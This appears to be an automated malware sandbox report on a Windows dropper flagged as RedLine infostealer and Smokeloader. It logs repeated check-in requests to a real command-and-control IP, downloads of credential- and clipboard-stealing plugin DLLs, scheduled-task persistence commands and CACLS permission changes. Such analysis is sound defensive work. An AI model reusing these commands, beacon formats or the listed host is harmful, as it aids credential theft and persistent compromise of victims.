                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 06 Feb 2023 13:16:28 GMTContent-Type: application/octet-streamContent-Length: 91136Last-Modified: Fri, 03 Feb 2023 17:19:21 GMTConnection: keep-aliveETag: "63dd4219-16400"Accept-Ranges: bytes
                          Source: Joe Sandbox ViewASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI
                          Source: Joe Sandbox ViewIP Address: 62.204.41.4 62.204.41.4
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_001786E2 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,8_2_001786E2
                          Source: global trafficHTTP traffic detected: GET /Gol478Ns/Plugins/cred64.dll HTTP/1.1Host: 62.204.41.4
                          Source: global trafficHTTP traffic detected: GET /Gol478Ns/Plugins/clip64.dll HTTP/1.1Host: 62.204.41.4
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 06 Feb 2023 13:16:28 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                          Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.4
                          Source: unknownHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1

                          System Summary

                          Source: 2.2.ajAf.exe.1fc0e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 2.3.ajAf.exe.1ff0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 2.2.ajAf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 2.2.ajAf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                          Source: 00000002.00000002.414193208.00000000005F7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                          Source: 00000002.00000003.390341867.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: 2.2.ajAf.exe.1fc0e67.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 2.3.ajAf.exe.1ff0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 2.2.ajAf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 2.2.ajAf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                          Source: 00000002.00000002.414193208.00000000005F7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                          Source: 00000002.00000003.390341867.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_010C1F90
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exeCode function: 1_2_01091F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_01091F90
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: String function: 0040E1D8 appears 44 times
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: String function: 01FCE43F appears 44 times
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: String function: 00187CE0 appears 40 times
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: String function: 00185E20 appears 130 times
                          Source: file.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 441732 bytes, 2 files, at 0x2c +A "bjAg.exe" +A "xriv.exe", ID 1565, number 1, 20 datablocks, 0x1503 compression
                          Source: bjAg.exe.0.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 250578 bytes, 2 files, at 0x2c +A "ajAf.exe" +A "nika.exe", ID 1525, number 1, 12 datablocks, 0x1503 compression
                          Source: file.exe, 00000000.00000003.307249151.0000000004A44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                          Source: file.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ajAf.exe.log
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@34/14@0/1
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe File read: C:\Users\user\Desktop\desktop.ini
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_010C597D
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_0223A1A8 ChangeServiceConfigA,2_2_0223A1A8
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C4FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,0_2_010C4FE0
                          Source: file.exeReversingLabs: Detection: 66%
                          Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                          Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exe
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe
                          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /E
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /E
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                          Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5576:120:WilError_01
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeMutant created: \Sessions\1\BaseNamedObjects\c1ec479e5342a25940592acf24703eb2
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:920:120:WilError_01
                          Source: C:\Users\user\Desktop\file.exeCommand line argument: Kernel32.dll0_2_010C2BFB
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exeCommand line argument: Kernel32.dll1_2_01092BFB
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCommand line argument: 08A2_2_00413780
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
